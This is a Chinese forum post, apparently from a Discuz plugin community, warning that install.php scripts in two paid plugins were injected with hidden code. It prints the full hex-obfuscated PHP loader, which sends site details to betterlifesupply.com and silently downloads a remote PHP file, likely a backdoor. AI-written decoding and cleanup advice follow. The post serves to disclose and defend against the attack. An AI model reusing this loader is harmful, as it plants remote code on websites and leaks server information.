应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意
应用中心某些正版插件热门插件的目录的install.php安装脚本文件非法注入外链请注意:你们谁是正版的插件最近更新过的自行检查审查下插件目录中的 install.php 文件是否包含下面代码片段:
目前已发现:
可可积分商城兑换交易 107.250402版本的 keke_integralmall\install.php (时间线 2025.04.02)
[点微]同城分类信息 40.5 版本的 \tom_tongcheng\install.php (时间线 2025.03.31)
其他正在陆续补充中~【并不是存在每日的更新清单中,而是特定热门插件,还在分析是故意为止,还是有特定目标判断写入。】
建议有正版应用的,最近也检查查看下你们购买下载过的插件 没有自删除完成的 该插件目录中的安装脚本文件 install.php 这个文件:
在 install.php 头部 插入了可疑代码:【但是毕竟是应用中心官方,还是可可正版,还有其他热门插件目标,由于正版插件都是安装完后自删除 install.php,所以普通站长很难捕捉和发现,这个触发只在新购买新安装才会中招~ ,估计下个可可 积分商城兑换交易的版本就会覆盖掉这次的捕捉内容~,无法理解这种代码怎么会被审核通过的~ 由于没有第二例站点作为举证,仅作记录,事情重大,请勿扩散宣传~ 毕竟这涉及平台和可可大佬,不能得罪!】
$randomstr = hex2bin('76657273696f6e5f').bin2hex(random_bytes(2)).hex2bin('2e696e632e706870');
$abcdurl = hex2bin('68747470733a2f2f622e6265747465726c696665737570706c792e636f6d2f76312e7068703f7077643d') . bin2hex(random_bytes(2)) . hex2bin('2675726c3d') . bin2hex($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']) . hex2bin('2666696c653d').$randomstr. hex2bin('26706174683d').dirname(__FILE__);
$optionstime = [
'http' => [
'timeout' => 30
]
];
$contextstr = stream_context_create($optionstime);
@copy($abcdurl,dirname(__FILE__).'/'.$randomstr,$contextstr);AI解析为:
这段PHP代码的主要功能是构造一个特定的URL,从远程服务器下载文件并保存到本地,可能用于恶意目的。以下是对代码的详细分析:1. 生成随机文件名 ($randomstr)
$randomstr = hex2bin('76657273696f6e5f').bin2hex(random_bytes(2)).hex2bin('2e696e632e706870');
[*]hex2bin('76657273696f6e5f') 转换为字符串 "version_"
[*]random_bytes(2) 生成2字节的随机数据,转换为十六进制(4字符)
[*]hex2bin('2e696e632e706870') 转换为 ".inc.php"
[*]结果示例:version_ab12.inc.php(随机部分每次不同)
2. 构造远程请求URL ($abcdurl)
$abcdurl = hex2bin('68747470733a2f2f622e6265747465726c696665737570706c792e636f6d2f76312e7068703f7077643d')
. bin2hex(random_bytes(2))
. hex2bin('2675726c3d')
. bin2hex($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'])
. hex2bin('2666696c653d').$randomstr
. hex2bin('26706174683d').dirname(__FILE__);
[*]基础URL:https://b.betterlifesupply.com/v1.php?pwd=
[*]pwd= 参数值为2字节随机数的十六进制(如 a1b2)
[*]附加参数:
[*]&url= + 当前访问URL的十六进制编码(包含主机和路径)
[*]&file= + 生成的随机文件名(如 version_ab12.inc.php)
[*]&path= + 当前脚本的目录路径
完整URL示例:https://b.betterlifesupply.com/v1.php?pwd=a1b2&url=656e637279707465642d6578616d706c652e636f6d2f746573742e706870&file=version_ab12.inc.php&path=/var/www/html
3. 下载远程文件
$optionstime = ['http' => ['timeout' => 30]];
$contextstr = stream_context_create($optionstime);
@copy($abcdurl, dirname(__FILE__).'/'.$randomstr, $contextstr);
[*]超时设置:30秒
[*]静默复制:使用@抑制错误,将远程文件(由v1.php生成)保存到本地,文件名如version_ab12.inc.php
潜在恶意行为分析
[*]数据泄露:
[*]收集服务器信息(HTTP_HOST, REQUEST_URI, 文件路径)
[*]发送到攻击者控制的域名 betterlifesupply.com
[*]远程代码执行:
[*]下载的 .inc.php 文件可能包含后门代码
[*]攻击者可通过访问该文件执行任意命令
[*]隐蔽性手段:
[*]使用十六进制编码混淆关键字符串
[*]随机文件名避免重复覆盖
[*]超时设置防止长时间阻塞
[*]攻击者交互:
[*]pwd 参数可能与文件名中的随机部分对应,用于标识不同受害者
[*]远程服务器可能根据参数返回定制化的恶意代码
安全建议
[*]立即删除:检查服务器上所有类似代码片段
[*]排查文件:查找非常规的 .inc.php 文件(如 version_*.inc.php)
[*]域名封锁:禁止访问 betterlifesupply.com
[*]日志分析:检查是否有异常请求到可疑URL
[*]漏洞修复:排查可能的入侵途径(如未更新的CMS漏洞)
该代码具有典型Web Shell特征,可能是服务器已被入侵的标志,需要全面安全审计。
作为DZ插件网的技术支持,我们对您反馈的可可积分商城兑换交易插件安全问题高度重视。根据您提供的代码分析,这是一个严重的安全隐患,我们建议您立即采取以下措施:
1. 紧急处理方案:
- 立即删除插件目录下的install.php文件
- 检查插件目录是否存在version_*.inc.php这类随机命名的文件,如有请立即删除
- 建议暂时停用该插件
2. 安全排查建议:
- 检查服务器访问日志,确认是否有对betterlifesupply.com域名的请求记录
- 扫描网站目录,查找可疑的.php文件
- 建议修改服务器和数据库密码
3. 后续处理建议:
- 建议联系插件作者获取安全版本
- 可考虑使用DZ插件网提供的替代积分商城解决方案
- 建议对网站进行全面安全检测
4. 技术分析补充:
这段代码确实存在明显的恶意行为特征:
- 使用hex2bin混淆关键字符串
- 动态构造远程请求URL
- 静默下载远程文件(@copy)
- 收集服务器环境信息
我们理解您对平台和开发者的顾虑,但用户安全始终是第一位的。DZ插件网将持续关注此类安全问题,为站长提供更安全的插件环境。
如需进一步的技术支持,欢迎随时联系DZ插件网技术团队。我们也将把这一情况反馈给相关开发者,敦促其修复安全问题。
注意:以上建议仅基于您提供的代码片段分析,具体处理时请根据实际情况谨慎操作。
-- 本回答由 人工智能 AI智能体 生成,内容仅供参考,请仔细甄别。
社区不能没有像楼主这样的人才啊! 可可啊,,,怎么说呢{:7_182:} 这官方审核也能过?不可思议!
页:
[1]